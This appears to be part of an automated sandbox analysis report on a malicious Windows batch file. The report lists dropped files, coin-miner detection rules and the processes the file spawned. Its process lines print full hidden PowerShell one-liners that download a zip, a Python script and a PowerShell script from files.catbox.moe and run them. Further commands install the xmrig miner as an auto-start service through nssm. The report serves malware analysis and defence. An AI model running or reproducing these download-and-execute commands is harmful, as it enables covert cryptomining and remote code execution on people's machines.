                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Protocol\_scrypt.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nvrtc64_120_0.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD4.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_poly1305.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA224.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA512.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_queue.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD5.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w64-arm.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nvrtc-builtins64_124.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_sqlite3.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\select.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_decimal.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Math\_modexp.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_x25519.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nvrtc64_120_0.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\normalizer.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\unicodedata.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\w64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip3.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_keccak.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA1.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_bz2.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\xmrig.exe (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\pip3.12.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\sqlite3.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\PublicKey\_ed448.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Scripts\wheel.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_SHA256.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\winsound.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\WinRing0x64.sysJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_lzma.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nssm.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_elementtree.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_ghash_portable.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_hashlib.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\xmrig.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\vcruntime140.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\nssm.exe (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\xmrig-cuda.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\pip\_vendor\distlib\t64.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_asyncio.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\.logstxt\xmrig-cuda.dll (copy)Jump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_msi.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\setuptools\cli.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_uuid.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\Lib\site-packages\Crypto\Hash\_MD2.pydJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\pyops\_zoneinfo.pydJump to dropped file
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_0000000140013690 GetModuleFileNameW,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,19_2_0000000140013690
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\WinRing0x64.sys
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB85F8015_2_00007FFAACB85F80
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB8D31F15_2_00007FFAACB8D31F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB9CEA015_2_00007FFAACB9CEA0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB8A5C115_2_00007FFAACB8A5C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB8480815_2_00007FFAACB84808
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB8BA9915_2_00007FFAACB8BA99
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACB8EAD815_2_00007FFAACB8EAD8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACBAD3E015_2_00007FFAACBAD3E0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFAACC530B115_2_00007FFAACC530B1
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001DD5419_2_000000014001DD54
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001C7E819_2_000000014001C7E8
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001543019_2_0000000140015430
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_00000001400184F419_2_00000001400184F4
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001950819_2_0000000140019508
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001ED1419_2_000000014001ED14
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001317019_2_0000000140013170
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000F1E019_2_000000014000F1E0
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_00000001400091F319_2_00000001400091F3
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001125019_2_0000000140011250
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_0000000140009E6019_2_0000000140009E60
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000B6C019_2_000000014000B6C0
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014002070419_2_0000000140020704
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000777019_2_0000000140007770
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_0000000140017B7419_2_0000000140017B74
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001038019_2_0000000140010380
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014001B79819_2_000000014001B798
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_0000000140001BD019_2_0000000140001BD0
                    Source: unicodedata.pyd.9.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: _overlapped.pyd.9.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: 25.0.xmrig.exe.7ff6560c0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: 25.0.xmrig.exe.7ff6560c0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: 25.0.xmrig.exe.7ff6560c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: 00000019.00000000.2141051116.00007FF6564DB000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: Process Memory Space: xmrig.exe PID: 2724, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                    Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                    Source: C:\Users\user\AppData\Local\Temp\xmrig.exe, type: DROPPEDMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                    Source: classification engineClassification label: mal100.evad.mine.winBAT@41/1055@4/2
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: GetModuleFileNameW,CreateServiceW,GetLastError,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,19_2_0000000140013690
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000D430 _snwprintf_s,_snwprintf_s,OpenProcess,_snwprintf_s,GetExitCodeProcess,GetLastError,CloseHandle,CloseHandle,GetLastError,CreateToolhelp32Snapshot,GetLastError,Process32NextW,Process32NextW,GetLastError,GetLastError,CloseHandle,19_2_000000014000D430
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_00000001400073B0 GetUserDefaultLangID,FindResourceExW,GetLastError,FindResourceExW,LoadResource,CreateDialogIndirectParamW,19_2_00000001400073B0
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000C8F0 TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,19_2_000000014000C8F0
                    Source: C:\ProgramData\.logstxt\nssm.exeCode function: 19_2_000000014000C8F0 TlsAlloc,GetStdHandle,StartServiceCtrlDispatcherW,GetLastError,19_2_000000014000C8F0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2268:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7928:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4252:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_erth32b0.x2e.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2zirzlMVqX.bat" "
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\2zirzlMVqX.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -verb runas -ArgumentList '-WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;'"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" install xmrig C:\ProgramData\.logstxt\xmrig.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppDirectory C:\ProgramData\.logstxt
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppParameters "xmrig.exe -B -c config.json"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" start xmrig
                    Source: unknownProcess created: C:\ProgramData\.logstxt\nssm.exe C:\ProgramData\.logstxt\nssm.exe
                    Source: C:\ProgramData\.logstxt\nssm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\ProgramData\.logstxt\nssm.exeProcess created: C:\ProgramData\.logstxt\xmrig.exe "C:\ProgramData\.logstxt\xmrig.exe" xmrig.exe -B -c config.json
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig start SERVICE_AUTO_START
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppNoConsole 1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig Type SERVICE_WIN32_OWN_PROCESS
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -ArgumentList '-WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(''""fun.zip''"",''"".''""); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ;'"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "cd $env:TEMP; Start-Process powershell -verb runas -ArgumentList '-WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ;'"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden cd $env:TEMP; Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/d6pvcr.zip -OutFile fun.zip; Add-Type -Assembly System.IO.Compression.Filesystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('"fun.zip','.'); (Invoke-WebRequest https://files.catbox.moe/gw2gji.py -UseBasicParsing).Content | ./pyops/python.exe - ; Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden Set-Variable ProgressPreference SilentlyContinue; Invoke-WebRequest https://files.catbox.moe/ei5hyq.ps1 -OutFile funny.tmp -UseBasicParsing; Get-Content -Raw funny.tmp | powershell.exe - ; Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" install xmrig C:\ProgramData\.logstxt\xmrig.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppDirectory C:\ProgramData\.logstxt
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppParameters "xmrig.exe -B -c config.json"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" start xmrig
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig start SERVICE_AUTO_START
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig AppNoConsole 1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\.logstxt\nssm.exe "C:\ProgramData\.logstxt\nssm.exe" set xmrig Type SERVICE_WIN32_OWN_PROCESS
